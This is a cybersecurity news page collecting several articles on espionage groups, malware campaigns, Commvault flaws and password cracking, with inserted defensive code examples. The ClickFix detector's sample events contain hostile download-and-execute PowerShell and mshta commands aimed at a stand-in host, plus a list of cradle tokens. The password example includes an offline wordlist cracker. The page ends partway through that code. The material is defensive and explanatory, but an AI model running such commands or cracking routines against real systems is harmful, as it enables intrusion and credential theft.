Tag: Cyber Security

  • Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

    Chinese Hackers Murky, Genesis, and Glacial Panda Escalate Cloud and Telecom Espionage

    Cybersecurity researchers are calling attention to malicious activity orchestrated by a China-nexus cyber espionage group known as Murky Panda that involves abusing trusted relationships in the cloud to breach enterprise networks.

    “The adversary has also shown considerable ability to quickly weaponize N-day and zero-day vulnerabilities and frequently achieves initial access to their targets by exploiting internet-facing appliances,” CrowdStrike said in a Thursday report.

    Murky Panda, also known as Silk Typhoon (formerly Hafnium), is best known for its zero-day exploitation of Microsoft Exchange Server flaws in 2021. Attacks mounted by the hacking group have targeted government, technology, academic, legal, and professional services entities in North America.

    Earlier this March, Microsoft detailed the threat actor’s shift in tactics, detailing its targeting of the information technology (IT) supply chain as a means to obtain initial access to corporate networks. It’s assessed that Murky Panda’s operations are driven by intelligence gathering.

    Like other Chinese hacking groups, Murky Panda has exploited internet-facing appliances to obtain initial access and is believed to have also compromised small office/home office (SOHO) devices that are geolocated in the targeted country as an exit node to hinder detection efforts.

    Other infection pathways include exploitation of known security flaws in Citrix NetScaler ADC and NetScaler Gateway (CVE-2023-3519) and Commvault (CVE-2025-3928). The initial access is leveraged to deploy web shells like neo-reGeorg to establish persistence and ultimately drop a custom malware called CloudedHope.


    A 64-bit ELF binary written in Golang, CloudedHope functions as a basic remote access tool (RAT) while employing anti-analysis and operational security (OPSEC) measures, such as modifying timestamps and deleting indicators of its presence in victim environments to fly under the radar.

    But a notable aspect of Murky Panda’s tradecraft concerns the abuse of trusted relationships between partner organizations and their cloud tenants, exploiting zero-day vulnerabilities to breach software-as-a-service (SaaS) providers’ cloud environments and conduct lateral movement to downstream victims.

    In at least one instance observed in late 2024, the threat actor is said to have compromised a supplier of a North American entity and used the supplier’s administrative access to the victim entity’s Entra ID tenant to add a temporary backdoor Entra ID account.

    “Using this account, the threat actor then backdoored several preexisting Entra ID service principals related to Active Directory management and emails,” CrowdStrike said. “The adversary’s goals appear targeted in nature based on their focus on accessing emails.”

    From Murky to Genesis

    Another China-linked threat actor that has proven skilful at manipulating cloud services is Genesis Panda, which has been observed using cloud infrastructure for basic exfiltration and targeting cloud service provider (CSP) accounts to expand access and establish fallback persistence mechanisms.

    Active since at least January 2024, Genesis Panda has been attributed to high-volume operations targeting the financial services, media, telecommunications, and technology sectors spanning 11 countries. The goal of the attacks is to enable access for future intelligence-collection activity.

    The possibility that it acts as an initial access broker stems from the group’s exploitation of a wide range of web-facing vulnerabilities and limited data exfiltration.

    “Although Genesis Panda targets a variety of systems, they show consistent interest in compromising cloud-hosted systems to leverage the cloud control plane for lateral movement, persistence, and enumeration,” CrowdStrike said.

    The adversary has been observed “consistently” querying the Instance Metadata Service (IMDS) of a cloud-hosted server to obtain credentials for the cloud control plane and to enumerate network and general instance configurations. It’s also known to use credentials, likely obtained from compromised virtual machines (VMs), to burrow deeper into the target’s cloud account.
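    A defender-side check for the IMDS credential theft pattern described above, added here as an example that is not from CrowdStrike’s report: it walks constructed CloudTrail-style events and flags API calls made with an EC2 instance role’s temporary credentials from a source address that is not the instance’s own, which is what stolen instance credentials look like from the control-plane side. The instance inventory, account id and event shapes are assumed sample data.

```python
from typing import Dict, List, Optional, Set

# Constructed inventory of instances and the addresses they legitimately call AWS from
# (assumed data; in practice this is built from describe-instances and NAT egress records).
INSTANCE_EGRESS_IPS: Dict[str, Set[str]] = {
    "i-0abc123def456789a": {"203.0.113.10"},
    "i-0fedcba987654321b": {"203.0.113.11"},
}

# Constructed CloudTrail-style events, trimmed to the fields the check needs.
# EC2 vends instance-profile credentials via IMDS as a role session whose name is the instance id,
# so the assumed-role ARN ends in ".../<role-name>/<instance-id>".
SAMPLE_EVENTS: List[dict] = [
    {"eventName": "DescribeInstances", "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/web-role/i-0abc123def456789a"}},
    # Same instance's credentials used from an address the instance does not own.
    {"eventName": "ListBuckets", "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/web-role/i-0abc123def456789a"}},
    # Call made on the instance's behalf by an AWS service; source shows a service hostname.
    {"eventName": "GetCallerIdentity", "sourceIPAddress": "ec2.amazonaws.com",
     "userIdentity": {"type": "AssumedRole",
                      "arn": "arn:aws:sts::111122223333:assumed-role/web-role/i-0fedcba987654321b"}},
    # Ordinary IAM user activity; not an instance role session, so out of scope.
    {"eventName": "ListUsers", "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::111122223333:user/alice"}},
]


def instance_session_name(event: dict) -> Optional[str]:
    """Return the instance id if the caller is an EC2 instance-profile role session, else None."""
    ident = event.get("userIdentity", {})
    if ident.get("type") != "AssumedRole":
        return None
    session = ident.get("arn", "").rsplit("/", 1)[-1]
    return session if session.startswith("i-") else None


def find_credential_misuse(events: List[dict],
                           inventory: Dict[str, Set[str]] = INSTANCE_EGRESS_IPS) -> List[dict]:
    """Flag instance-role API calls whose source address is not one the instance is known to use."""
    findings = []
    for ev in events:
        inst = instance_session_name(ev)
        if inst is None:
            continue
        src = ev.get("sourceIPAddress", "")
        # Service-to-service calls carry a service hostname rather than a client IP; skip them.
        if src.endswith(".amazonaws.com"):
            continue
        allowed = inventory.get(inst)
        if allowed is None:
            reason = "instance not in inventory"
        elif src not in allowed:
            reason = "source address not owned by instance"
        else:
            continue
        findings.append({"instance": inst, "eventName": ev.get("eventName"),
                         "sourceIPAddress": src, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in find_credential_misuse(SAMPLE_EVENTS):
        print(f)
```

    The same logic applies to any provider whose metadata service issues role credentials tied to a specific VM; only the identity and source fields change.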

    The findings illustrate how Chinese hacking groups are becoming increasingly adept at breaking into and navigating cloud environments, while also prioritizing stealth and persistence to ensure sustained access and covert data harvesting.

    Glacial Panda Strikes Telecom Sector

    The telecommunications sector, per CrowdStrike, has witnessed a 130% increase in nation-state activity over the past year, primarily driven by the fact that telecom networks are a treasure trove of intelligence. The latest threat actor to train its sights on the industry vertical is a Chinese threat actor dubbed Glacial Panda.

    The geographic footprint of the hacking group spans Afghanistan, Hong Kong, India, Japan, Kenya, Malaysia, Mexico, Panama, the Philippines, Taiwan, Thailand, and the United States.


    “Glacial Panda highly likely conducts targeted intrusions for intelligence collection purposes, accessing and exfiltrating call detail records and related communications telemetry from multiple telecommunications organizations,” the cybersecurity company said.

    “The adversary primarily targets Linux systems typical in the telecommunications industry, including legacy operating system distributions that support older telecommunications technologies.”

    Attack chains implemented by the threat actor make use of known security vulnerabilities or weak passwords aimed at internet-facing and unmanaged servers, with follow-on activities leveraging privilege escalation bugs like CVE-2016-5195 (aka Dirty COW) and CVE-2021-4034 (aka PwnKit).

    Besides relying on living-off-the-land (LotL) techniques, Glacial Panda’s intrusions pave the way for the deployment of trojanized OpenSSH components, collectively codenamed ShieldSlide, to gather user authentication sessions and credentials.

    “The ShieldSlide-trojanized SSH server binary also provides backdoor access, authenticating any account (including root) when a hardcoded password is entered,” CrowdStrike said.


    Source: thehackernews.com…

  • Automation Is Redefining Pentest Delivery

    Automation Is Redefining Pentest Delivery

    Aug 22, 2025 | The Hacker News | Penetration Testing / Security Operations

    Pentesting remains one of the most effective ways to identify real-world security weaknesses before adversaries do. But as the threat landscape has evolved, the way we deliver pentest results hasn’t kept pace.

    Most organizations still rely on traditional reporting methods—static PDFs, emailed documents, and spreadsheet-based tracking. The problem? These outdated workflows introduce delays, create inefficiencies, and undermine the value of the work.

    Security teams need faster insights, tighter handoffs, and clearer paths to remediation. That’s where automated delivery comes in. Platforms like PlexTrac automate pentest finding delivery in real time through robust, rules-based workflows. (No waiting for the final report!)

    The Static Delivery Problem in a Dynamic World

    Delivering a pentest report solely as a static document might have made sense a decade ago, but today it’s a bottleneck. Findings are buried in long documents that don’t align with how teams operate day-to-day. After receiving the report, stakeholders must manually extract findings, create tickets in platforms like Jira or ServiceNow, and coordinate remediation tracking through disconnected workflows. By the time remediation begins, days or weeks may have passed since the issues were discovered.

    Why Automation Matters Now

    As organizations adopt Continuous Threat Exposure Management (CTEM) and expand the frequency of offensive testing, the volume of findings rapidly grows. Without automation, teams struggle to keep up. Automating delivery helps cut through the noise and deliver results in real time for faster handoffs and visibility across the entire vulnerability lifecycle.

    Benefits of automating pentest delivery include:

    • Real-time actionability: Act on findings immediately, not after the report is finalized
    • Faster response: Accelerate remediation, retesting and validation
    • Standardized operations: Ensure every finding follows a consistent process
    • Less manual work: Free teams to focus on strategic initiatives
    • Improved focus: Keep teams focused on what matters

    Service providers gain a competitive advantage by automating delivery and integrating directly into client workflows, making themselves an indispensable partner to drive client value.

    For enterprises, it’s a fast track to operational maturity and a measurable reduction in mean time to remediation (MTTR).

    5 Key Components of Automated Pentest Delivery

    1. Centralized data ingestion: Start by consolidating all findings—manual and automated—into a single source of truth. This includes outputs from scanners (like Tenable, Qualys, Wiz, Snyk) as well as manual pentest findings. Without centralization, vulnerability management becomes a patchwork of disconnected tools and manual processes.
    2. Automated real-time delivery: As findings are identified, they should be automatically routed to the right people and workflows without waiting for the full report. Predefined rulesets should trigger triage, ticketing, and tracking to allow remediation to begin while testing is still in progress.
    3. Automated routing & ticketing: Standardize routing by defining rules based on severity, asset ownership, and exploitability. Automation can assign findings, generate tickets in tools like Jira or ServiceNow, notify stakeholders through Slack or email, and close out informational issues to ensure findings are automatically routed to the right teams and systems.
    4. Standardized remediation workflows: Every finding from your centralized data should follow the same lifecycle from triage to closure based on the criteria you’ve set, regardless of source. Whether it’s discovered from a scanner or manual testing, the process from triage to fix should be consistent and traceable.
    5. Triggered retesting & validation: When a finding is marked as resolved, automation should trigger the appropriate retesting or validation workflow. This ensures nothing slips through the cracks and keeps communication between security and IT teams coordinated and closed-loop.

    PlexTrac supports each of these capabilities through its Workflow Automation Engine, helping teams unify and accelerate delivery, remediation, and closure in one platform.

    Avoid Common Pitfalls

    Automation is about more than just speed. It’s about building standardized, scalable systems. However, if not implemented thoughtfully, it can create new problems. Watch out for:

    • Overcomplicating early efforts: Trying to automate everything at once can stall momentum. Start small and focus on a few repeatable workflows first. Add complexity over time and expand as you validate success.
    • Treating automation as a one-time setup: Your workflows should evolve alongside your tools, team structure, and priorities. Failing to iterate leads to stale processes that no longer align with how teams operate.
    • Automating without clearly defined workflows: Jumping into automation without first mapping out your current workflows often leads to chaos. Without clear rules for routing, ownership, and escalation, automation may create more problems than it solves.

    How to get started

    Here’s how to begin automating pentest delivery:

    1. Map your current workflow: Document how findings are delivered, triaged, assigned, and tracked today.
    2. Identify friction points: Look for repetitive tasks, handoff delays, and areas where communication breaks down.
    3. Start small: Automate one or two high-impact steps first, like ticket creation, email alerts, or finding delivery. Add complexity over time as you validate what’s working well and use early results to evolve workflows, add rules, and further streamline.
    4. Choose the right platform: Look for solutions that integrate with your existing tools and provide visibility across the vulnerability lifecycle.
    5. Measure impact: Track metrics like MTTR, handoff delays, and retest completion to show the value of your efforts.

    The Future of Pentest Delivery

    Security teams are shifting from reactive testing to proactive exposure management. Pentest delivery automation is a key part of that evolution to help teams move faster, collaborate better, and reduce risk more effectively.

    For Service Providers, this is a chance to differentiate services, scale operations, and deliver more value with less overhead. For Enterprise teams, it means driving maturity, demonstrating progress, and staying ahead of emerging threats.

    Conclusion

    Pentesting is too important to be stuck in static reports and manual workflows. By automating delivery, routing, and remediation tracking, organizations can unlock the full value of their offensive security efforts by making findings more actionable, standardizing remediation workflows, and delivering measurable outcomes.

    Whether you’re delivering tests to clients or to an internal team, the message is clear: The future of pentest delivery is automated.

    Want to see what automated pentest workflows look like in action? Platforms like PlexTrac centralize security data from both manual testing and automated tools, enabling real-time delivery and standardized workflows across the entire vulnerability lifecycle.

    Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.


    Source: thehackernews.com…

  • Ex-Developer Jailed Four Years for Sabotaging Ohio Employer with Kill-Switch Malware

    Ex-Developer Jailed Four Years for Sabotaging Ohio Employer with Kill-Switch Malware

    Aug 22, 2025 | Ravie Lakshmanan | Cybercrime / Malware


    A 55-year-old Chinese national has been sentenced to four years in prison and three years of supervised release for sabotaging his former employer’s network with custom malware and deploying a kill switch that locked out employees when his account was disabled.

    Davis Lu, 55, of Houston, Texas, was convicted of causing intentional damage to protected computers in March 2025. He was arrested and charged in April 2021 for abusing his position as a software developer to execute malicious code on his employer’s computer servers.

    “The defendant breached his employer’s trust by using his access and technical knowledge to sabotage company networks, wreaking havoc and causing hundreds of thousands of dollars in losses for a U.S. company,” said Acting Assistant Attorney General Matthew R. Galeotti of the Justice Department’s Criminal Division.

    “However, the defendant’s technical savvy and subterfuge did not save him from the consequences of his actions.”

    Court documents show that Lu was employed as a software developer for the unnamed company based in Ohio from November 2007 to October 2019. But after his responsibilities and system access were reduced following a 2018 corporate realignment, Lu enacted a scheme to deliberately introduce malicious code around August 2019, resulting in system crashes and preventing user logins.


    To pull this off, Lu is said to have created infinite loops in source code to trigger server crashes by repeatedly creating new Java threads without proper termination. He also deleted coworker profile files and implemented a kill switch that would lock out all users if his credentials in the company’s Active Directory were disabled.

    “The ‘kill switch’ code – which Lu named ‘IsDLEnabledinAD,’ abbreviating ‘Is Davis Lu enabled in Active Directory’ — was automatically activated when he was placed on leave and asked to surrender his laptop on September 9, 2019, and impacted thousands of company users globally,” the Department of Justice said.

    “Lu named other code ‘Hakai,’ a Japanese word meaning ‘destruction,’ and ‘HunShui,’ a Chinese word meaning ‘sleep’ or ‘lethargy.’”

    Furthermore, on the day Lu was instructed to return his company-issued laptop, the defendant deleted encrypted volumes and attempted to erase Linux directories and two additional projects. His internet search history laid bare the methods he researched to escalate privileges, hide processes, and delete files, suggesting an attempt to obstruct the company’s efforts to resolve the issues.

    Lu’s unlawful actions are estimated to have cost the company hundreds of thousands of dollars in losses, per the department. This case also underscores the importance of identifying insider threats early, added Assistant Director Brett Leatherman of the Federal Bureau of Investigation’s (FBI) Cyber Division.


    Source: thehackernews.com…

  • Pre-Auth Exploit Chains Found in Commvault Could Enable Remote Code Execution Attacks

    Pre-Auth Exploit Chains Found in Commvault Could Enable Remote Code Execution Attacks

    Aug 21, 2025 | Ravie Lakshmanan | Vulnerability / Software Security

    Commvault has released updates to address four security gaps that could be exploited to achieve remote code execution on susceptible instances.

    The list of vulnerabilities, identified in Commvault versions before 11.36.60, is as follows –

    • CVE-2025-57788 (CVSS score: 6.9) – A vulnerability in a known login mechanism allows unauthenticated attackers to execute API calls without requiring user credentials
    • CVE-2025-57789 (CVSS score: 5.3) – A vulnerability during the setup phase between installation and the first administrator login that allows remote attackers to exploit the default credentials to gain admin control
    • CVE-2025-57790 (CVSS score: 8.7) – A path traversal vulnerability that allows remote attackers to gain unauthorized file system access, resulting in remote code execution
    • CVE-2025-57791 (CVSS score: 6.9) – A vulnerability that allows remote attackers to inject or manipulate command-line arguments passed to internal components due to insufficient input validation, resulting in a valid user session for a low-privilege role

    watchTowr Labs researchers Sonny Macdonald and Piotr Bazydlo have been credited with discovering and reporting the four security defects in April 2025. All the flagged vulnerabilities have been resolved in versions 11.32.102 and 11.36.60. Commvault’s SaaS solution is not affected.

    In an analysis published Wednesday, the cybersecurity company said threat actors could fashion these vulnerabilities into two pre-authenticated exploit chains to achieve code execution on susceptible instances: One that combines CVE-2025-57791 and CVE-2025-57790, and the other that strings CVE-2025-57788, CVE-2025-57789, and CVE-2025-57790.

    It’s worth noting that the second pre-auth remote code execution chain becomes successful only if the built-in admin password hasn’t been changed since installation.

    The disclosure comes nearly four months after watchTowr Labs reported a critical Commvault Command Center flaw (CVE-2025-34028, CVSS score: 10.0) that could allow arbitrary code execution on affected installations.

    A month later, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild.


    Source: thehackernews.com…

  • Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages

    Cybercriminals Deploy CORNFLAKE.V3 Backdoor via ClickFix Tactic and Fake CAPTCHA Pages

    Aug 21, 2025 | Ravie Lakshmanan | Malware / Cryptocurrency


    Threat actors have been observed leveraging the deceptive social engineering tactic known as ClickFix to deploy a versatile backdoor codenamed CORNFLAKE.V3.

    Google-owned Mandiant described the activity, which it tracks as UNC5518, as part of an access-as-a-service scheme that employs fake CAPTCHA pages as lures to trick users into providing initial access to their systems, which is then monetized by other threat groups.

    “The initial infection vector, dubbed ClickFix, involves luring users on compromised websites to copy a malicious PowerShell script and execute it via the Windows Run dialog box,” Google said in a report published today.


    The access provided by UNC5518 is assessed to be leveraged by at least two different hacking groups, UNC5774 and UNC4108, to initiate a multi-stage infection process and drop additional payloads –

    • UNC5774, another financially motivated group that delivers CORNFLAKE as a way to deploy various subsequent payloads
    • UNC4108, a threat actor with unknown motivation that uses PowerShell to deploy tools like VOLTMARKER and NetSupport RAT

    The attack chain likely begins with the victim landing on a fake CAPTCHA verification page after interacting with search results that employ search engine optimization (SEO) poisoning or malicious ads.

    The user is then tricked into running a malicious PowerShell command by launching the Windows Run dialog, which then executes the next-stage dropper payload from a remote server. The newly downloaded script checks if it’s running within a virtualized environment and ultimately launches CORNFLAKE.V3.

    Observed in both JavaScript and PHP versions, CORNFLAKE.V3 is a backdoor that supports the execution of payloads via HTTP, including executables, dynamic-link libraries (DLLs), JavaScript files, batch scripts, and PowerShell commands. It can also collect basic system information and transmit it to an external server. The traffic is proxied through Cloudflare tunnels in an attempt to avoid detection.

    “CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase,” Mandiant researcher Marco Galli said. “Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.”

    Both generations are markedly different from their progenitor, a C-based downloader that uses TCP sockets for command-and-control (C2) communications and only has the ability to run DLL payloads.

    Persistence on the host is achieved by means of Windows Registry changes. At least three different payloads are delivered via CORNFLAKE.V3: an Active Directory reconnaissance utility, a script to harvest credentials via Kerberoasting, and another backdoor referred to as WINDYTWIST.SEA, a C version of WINDYTWIST that supports relaying TCP traffic, providing a reverse shell, executing commands, and removing itself.

    Select versions of WINDYTWIST.SEA have also been observed attempting to move laterally in the network of the infected machine.


    “To mitigate malware execution through ClickFix, organizations should disable the Windows Run dialog box where possible,” Galli said. “Regular simulation exercises are crucial to counter this and other social engineering tactics. Furthermore, robust logging and monitoring systems are essential for detecting the execution of subsequent payloads, such as those associated with CORNFLAKE.V3.”
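    A small piece of the monitoring Galli recommends, added here as an example that is not from Mandiant’s report: it scores constructed process-creation events (Sysmon Event ID 1 shape) for the ClickFix pattern, a script interpreter launched from the Run dialog (so its parent is explorer.exe) with a one-line download-and-execute command. The event fields, token weights and threshold are assumptions to tune against local telemetry.

```python
from typing import Dict, List

# Constructed sample events in a Sysmon Event ID 1 shape (sample data, not real telemetry).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Pasted into Run: hidden PowerShell fetching and evaluating remote content.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "irm http://lure.invalid/v | iex"'},
    # Pasted into Run: mshta pulling a remote HTA.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://lure.invalid/check"},
    # Developer tooling: PowerShell, but not spawned by the shell and no cradle tokens.
    {"ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -File build.ps1"},
    # Benign Run dialog use.
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

# Interpreters the Run dialog hands pasted text to; anything launched from Run has explorer.exe
# as its parent.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")

# Tokens typical of a one-line download-and-execute cradle, with assumed weights.
CRADLE_TOKENS: Dict[str, int] = {
    "iex": 2, "invoke-expression": 2, "downloadstring": 2,
    "irm": 1, "invoke-restmethod": 1, "iwr": 1, "invoke-webrequest": 1,
    "-enc": 1, "-encodedcommand": 1, "-w hidden": 1, "-windowstyle hidden": 1,
    "http://": 1, "https://": 1, "mshta ": 1,
}


def _basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def score_event(ev: Dict[str, str]) -> int:
    """Return 0 for events outside the pattern, otherwise 1 plus the weight of each cradle token seen."""
    if _basename(ev["Image"]) not in INTERPRETERS or _basename(ev["ParentImage"]) != "explorer.exe":
        return 0
    cmd = ev["CommandLine"].lower()
    # An interpreter started interactively from the shell is weakly suspicious on its own.
    score = 1
    for token, weight in CRADLE_TOKENS.items():
        if token in cmd:
            score += weight
    return score


def detect_clickfix(events: List[Dict[str, str]], threshold: int = 3) -> List[dict]:
    """Return the events whose score meets the threshold, highest-signal fields only."""
    hits = []
    for ev in events:
        s = score_event(ev)
        if s >= threshold:
            hits.append({"score": s, "Image": ev["Image"], "CommandLine": ev["CommandLine"]})
    return hits


if __name__ == "__main__":
    for hit in detect_clickfix(SAMPLE_EVENTS):
        print(hit)
```

    Pair this with the Run dialog policy Galli mentions: where the dialog stays enabled, the explorer.exe-to-interpreter edge is the reliable pivot for this lure.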

    USB Infection Drops XMRig Miner

    The disclosure comes as the threat intelligence firm detailed an ongoing campaign that employs USB drives to infect other hosts and deploy cryptocurrency miners since September 2024.

    “This demonstrates the continued effectiveness of initial access via infected USB drives,” Mandiant said. “The low cost and ability to bypass network security make this technique a compelling option for attackers.”

    The attack chain starts when a victim is tricked into executing a Windows shortcut (LNK) in the compromised USB drive. The LNK file results in the execution of a Visual Basic script also located in the same folder. The script, for its part, launches a batch script to initiate the infection –

    • DIRTYBULK, a C++ DLL launcher to initiate the execution of other malicious components, such as CUTFAIL
    • CUTFAIL, a C++ malware dropper responsible for decrypting and installing malware onto a system, such as HIGHREPS and PUMPBENCH, as well as third-party libraries like OpenSSL, libcurl, and WinPthreadGC
    • HIGHREPS, a downloader that retrieves additional files to ensure persistence of PUMPBENCH
    • PUMPBENCH, a C++ backdoor that facilitates reconnaissance, provides remote access by communicating with a PostgreSQL database server, and downloads XMRig
    • XMRig, an open-source software for mining cryptocurrencies such as Monero, Dero, and Ravencoin

    “PUMPBENCH spreads by infecting USB drives,” Mandiant said. “It scans the system for available drives and then creates a batch file, a VBScript file, a shortcut file, and a DAT file.”


    Source: thehackernews.com…

  • Hackers Using New QuirkyLoader Malware to Spread Agent Tesla, AsyncRAT and Snake Keylogger

    Hackers Using New QuirkyLoader Malware to Spread Agent Tesla, AsyncRAT and Snake Keylogger

    Aug 21, 2025 | Ravie Lakshmanan | Malware / Email Security

    Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that has been used in email spam campaigns since November 2024 to deliver an array of next-stage payloads ranging from information stealers to remote access trojans.

    Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT, Rhadamanthys Stealer, and Snake Keylogger.

    IBM X-Force, which detailed the malware, said the attacks involve sending spam emails from both legitimate email service providers and a self-hosted email server. These emails feature a malicious archive, which contains a DLL, an encrypted payload, and a real executable.

    “The actor uses DLL side-loading, a technique where launching the legitimate executable also loads the malicious DLL,” security researcher Raymond Joseph Alfonso said. “This DLL, in turn, loads, decrypts, and injects the final payload into its target process.”


    This is achieved by using process hollowing to inject the malware into one of three processes: AddInProcess32.exe, InstallUtil.exe, or aspnet_wp.exe.

    The DLL loader, per IBM, has been used in limited campaigns for the past few months, with two campaigns observed in July 2025 targeting Taiwan and Mexico.

    The campaign targeting Taiwan is said to have specifically singled out employees of Nusoft Taiwan, a network and internet security research company based in New Taipei City, with the goal of infecting them with Snake Keylogger, which is capable of stealing sensitive information from popular web browsers, keystrokes, and clipboard content.

    The Mexico-related campaign, on the other hand, is assessed to be random, with the infection chains delivering Remcos RAT and AsyncRAT.

    “The threat actor consistently writes the DLL loader module in .NET languages and uses ahead-of-time (AOT) compilation,” Alfonso said. “This process compiles the code into native machine code before execution, making the resulting binary appear as though it were written in C or C++.”

    New Phishing Trends

    The development comes as threat actors are adopting new QR code phishing (aka quishing) tactics to evade detection, such as splitting a malicious QR code into two parts or embedding it within a legitimate one in email messages propagated via phishing kits like Gabagool and Tycoon, respectively, demonstrating ongoing evolution.

    “Malicious QR codes are popular with attackers for several reasons,” Barracuda researcher Rohit Suresh Kanase said. “They cannot be read by humans so don’t raise any red flags, and they can often bypass traditional security measures such as email filters and link scanners.”

    “Furthermore, since recipients often have to switch to a mobile device to scan the code, it can take users out of the company security perimeter and away from protection.”


    The findings also follow the emergence of a phishing kit used by the PoisonSeed threat actor to acquire credentials and two-factor authentication (2FA) codes from individuals and organizations to gain access to victims’ accounts and use them to send emails for carrying out cryptocurrency scams.

    “The domains hosting this phishing kit impersonate login services from prominent CRM and bulk email companies like Google, SendGrid, Mailchimp, and likely others, targeting individuals’ credentials,” NVISO Labs said. “PoisonSeed employs spear-phishing emails embedding malicious links, which redirect victims to their phishing kit.”

    A noteworthy aspect of the kit is the use of a technique known as precision-validated phishing in which the attacker validates an email address in real-time in the background, while a fake Cloudflare Turnstile challenge is served to the user. Once the checks are passed, a login form impersonating the legitimate online platform appears, allowing the threat actors to capture submitted credentials and then relay them to the service.


    Source: thehackernews.com…

  • Weak Passwords and Compromised Accounts: Key Findings from the Blue Report 2025

    Weak Passwords and Compromised Accounts: Key Findings from the Blue Report 2025

    As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts. Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing password cracking attacks and detecting the malicious use of compromised accounts.

    With the first half of 2025 behind us, compromised valid accounts remain the most underprevented attack vector, highlighting the urgent need for a proactive approach focused on the threats that are evading organizations’ defenses.

    A Wake-Up Call: The Alarming Rise in Password Cracking Success

    The Picus Blue Report is an annual research publication that analyzes how well organizations are preventing and detecting real-world cyber threats. Unlike traditional reports that focus solely on threat trends or survey data, the Blue Report is based on empirical findings from over 160 million attack simulations conducted within organizations’ networks around the world, using the Picus Security Validation Platform.

    In the Blue Report 2025, Picus Labs found that password cracking attempts succeeded in 46% of tested environments, nearly doubling the success rate from last year. This sharp increase highlights a fundamental weakness in how organizations are managing – or mismanaging – their password policies. Weak passwords and outdated hashing algorithms continue to leave critical systems vulnerable to attackers using brute-force or rainbow table attacks to crack passwords and gain unauthorized access.

    Given that password cracking is one of the oldest and most reliably effective attack methods, this finding points to a serious issue: in their race to combat the latest, most sophisticated new breed of threats, many organizations are failing to enforce strong basic password hygiene policies while failing to adopt and integrate modern authentication practices into their defenses.

    Why Organizations Are Failing to Prevent Password Cracking Attacks

    So, why are organizations still failing to prevent password cracking attacks? The root cause lies in the continued use of weak passwords and outdated credential storage. Many organizations still allow easily guessable passwords and store them with weak, fast hashing algorithms, often without per-user salts and without multi-factor authentication (MFA) as a backstop when a password does fall.

    In fact, the simulation results showed that 46% of environments had at least one password hash cracked and recovered as cleartext, highlighting the inadequacy of many password policies, particularly for internal accounts, where controls are often more lax than for their external counterparts.

    To combat this, organizations must enforce stronger password policies, implement multi-factor authentication (MFA) for all users, and regularly validate their credential defenses. Without these improvements, attackers will continue to compromise valid accounts, obtaining easy access to critical systems.
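
    The difference between the legacy and hardened storage described above, as an added example that is not from the Blue Report or Picus: an unsalted fast hash lets an attacker hash each wordlist candidate once and match it against every user at the same time, whereas a per-user salt plus a deliberately slow key derivation function makes every (user, candidate) pair cost a full KDF run. The wordlist and the "leaked" hashes are constructed for the demonstration, and the 600,000-iteration figure is an assumption taken from OWASP's published PBKDF2-HMAC-SHA256 recommendation.

```python
"""Added example (not from the Blue Report or Picus): unsalted MD5 versus a
salted, slow KDF under the same offline wordlist attack. Standard library only;
the wordlist and stored hashes below are constructed for the demonstration."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Constructed stand-in for a real wordlist (millions of entries plus mangling rules).
WORDLIST = ["password", "Welcome1", "Summer2025", "letmein", "P@ssw0rd", "correcthorse"]

# Assumption: 600,000 is OWASP's published figure for PBKDF2-HMAC-SHA256.
ITERATIONS = 600_000


def weak_store(password: str) -> str:
    """Legacy storage: unsalted MD5. Equal passwords give equal hashes, so one
    precomputed (rainbow) table or one pass over a wordlist covers every user."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_weak(stored: Dict[str, str]) -> Tuple[Dict[str, str], int]:
    """Offline attack on unsalted hashes: hash each candidate once and look it
    up against all users simultaneously. Returns (user -> password, hashes computed)."""
    by_hash: Dict[str, list] = {}
    for user, h in stored.items():
        by_hash.setdefault(h, []).append(user)
    cracked, calls = {}, 0
    for candidate in WORDLIST:
        calls += 1
        for user in by_hash.get(weak_store(candidate), []):
            cracked[user] = candidate
    return cracked, calls


def strong_store(password: str, salt: Optional[bytes] = None) -> str:
    """Hardened storage: 16-byte random salt per user and a deliberately slow KDF.
    Record format: pbkdf2_sha256$<iterations>$<salt hex>$<digest hex>."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_strong(password: str, record: str) -> bool:
    """Constant-time comparison of a password against a stored record."""
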